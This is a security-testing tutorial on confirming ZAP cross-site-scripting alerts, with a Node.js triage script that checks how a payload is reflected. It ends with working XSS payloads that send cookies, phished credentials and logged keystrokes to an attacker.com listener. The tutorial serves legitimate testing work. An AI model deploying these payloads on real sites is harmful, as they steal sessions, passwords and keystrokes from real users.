Verifying and Demonstrating XSS Impact
Vulnerability verification prevents false-positive reports that waste remediation effort. When ZAP reports XSS, manually reproduce the finding using the exact payload and injection point shown in the alert's Evidence field, and weigh the Confidence the alert states. Confirm that JavaScript actually executes rather than merely being reflected: a payload that comes back HTML-entity-encoded (&lt;script&gt;) or lands inside a quoted attribute value is visible in the response but never runs. Use alert(document.domain) for the safe demonstration, since it also proves which origin the script runs in, and avoid payloads that might affect other users during testing.
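As an added example (not code from the original page), the following Node.js script triages a ZAP reflected-XSS alert from the raw HTTP response: it reports whether the exact payload came back verbatim, HTML-entity-encoded or percent-encoded, and for a verbatim reflection which parsing context it landed in, because a script tag reflected inside an attribute value is just text to the browser. The response bodies are constructed samples; in practice paste the body ZAP captured for the flagged request. The static check is evidence for or against a false positive, not proof of execution, which still needs the payload firing in a browser.

```javascript
// Added example, not part of the original page: static triage of a reflected-XSS
// alert. The sample response bodies below are constructed; replace them with the
// response ZAP captured for the flagged request.

function escapeHtml(s) {
  return s
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Where does the verbatim payload land? Heuristic on the text preceding the
// reflection: inside an open <script> element, inside a tag (an attribute
// value), or in ordinary element text.
function reflectionContext(body, index) {
  const before = body.slice(0, index).toLowerCase();
  if (before.lastIndexOf('<script') > before.lastIndexOf('</script')) return 'script';
  if (before.lastIndexOf('<') > before.lastIndexOf('>')) return 'attribute';
  return 'html';
}

function triage(payload, body) {
  const rawIndex = body.indexOf(payload);
  if (rawIndex !== -1) {
    const context = reflectionContext(body, rawIndex);
    // A tag payload reflected into an attribute value is inert: the "<" is text there.
    const tagInAttribute = context === 'attribute' && payload.startsWith('<');
    return {
      reflection: 'raw',
      context,
      verdict: tagInAttribute
        ? 'reflected inside an attribute: the payload must first break out of the quotes'
        : 'likely executable: confirm in a browser',
    };
  }
  if (body.includes(escapeHtml(payload))) {
    return { reflection: 'html-encoded', context: null, verdict: 'false positive: output is entity-encoded' };
  }
  if (body.includes(encodeURIComponent(payload))) {
    return { reflection: 'url-encoded', context: null, verdict: 'false positive: output is percent-encoded' };
  }
  return { reflection: 'absent', context: null, verdict: 'payload not reflected in this response' };
}

// Constructed responses to the same injected search term.
const TAG_PAYLOAD = '<script>alert(document.domain)</script>';
const RAW_TEXT = '<html><body><p>Results for: ' + TAG_PAYLOAD + '</p></body></html>';
const ENCODED = '<html><body><p>Results for: &lt;script&gt;alert(document.domain)&lt;/script&gt;</p></body></html>';
const IN_ATTRIBUTE = '<html><body><input name="q" value="' + TAG_PAYLOAD + '"></body></html>';

// A payload shaped for a JavaScript string context instead of an HTML text context.
const JS_PAYLOAD = '";alert(document.domain)//';
const IN_SCRIPT = '<html><script>var q = "' + JS_PAYLOAD + '";</script></html>';

for (const [name, body, payload] of [
  ['raw in text', RAW_TEXT, TAG_PAYLOAD],
  ['entity-encoded', ENCODED, TAG_PAYLOAD],
  ['raw in attribute', IN_ATTRIBUTE, TAG_PAYLOAD],
  ['raw in script', IN_SCRIPT, JS_PAYLOAD],
]) {
  console.log(name + ': ' + JSON.stringify(triage(payload, body)));
}
```

Give the payload a unique canary (for example a random suffix inside the alert call) before running this so the raw match cannot hit a string that was already on the page.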
Impact demonstration helps communicate XSS severity to stakeholders. Instead of a bare alert box, craft payloads that demonstrate a real attack: show session hijacking by reading document.cookie, demonstrate phishing by injecting a fake login form, or prove data access by reading page content. Note that document.cookie cannot see cookies flagged HttpOnly; when the session cookie is protected that way, demonstrate impact instead by having the payload issue authenticated requests from the victim's page (fetch with credentials included) or read sensitive DOM content. Send exfiltrated data only to a listener you control and test with dedicated accounts, so no real user data leaves the application. These demonstrations make abstract vulnerabilities concrete and motivate proper remediation.
<!-- Impact Demonstration Payloads (attacker.com stands for a listener you control) -->
<!-- Session Hijacking: send the non-HttpOnly cookies to the listener. The value is
     URL-encoded so ';' and '=' survive; mode 'no-cors' keeps the request from being
     reported as a CORS error in the console (the request is still sent) -->
<script>
fetch('http://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie), {mode: 'no-cors'})
</script>
<!-- Fake Login Form: a full-page overlay; the form posts the credentials to the listener -->
<div style="position:fixed;top:0;left:0;width:100%;height:100%;background:white;z-index:9999">
<form action="http://attacker.com/phish" method="POST">
<h2>Session Expired - Please Login</h2>
<input name="user" placeholder="Username">
<input name="pass" type="password" placeholder="Password">
<button>Login</button>
</form>
</div>
<!-- Keylogger: keydown fires for every key, including Enter, Tab and the arrows,
     which the deprecated keypress event misses; the key is URL-encoded so
     '&', '#' and '+' are not mangled in the query string -->
<script>
document.addEventListener('keydown', function(e) {
  fetch('http://attacker.com/log?key=' + encodeURIComponent(e.key), {mode: 'no-cors'});
});
</script>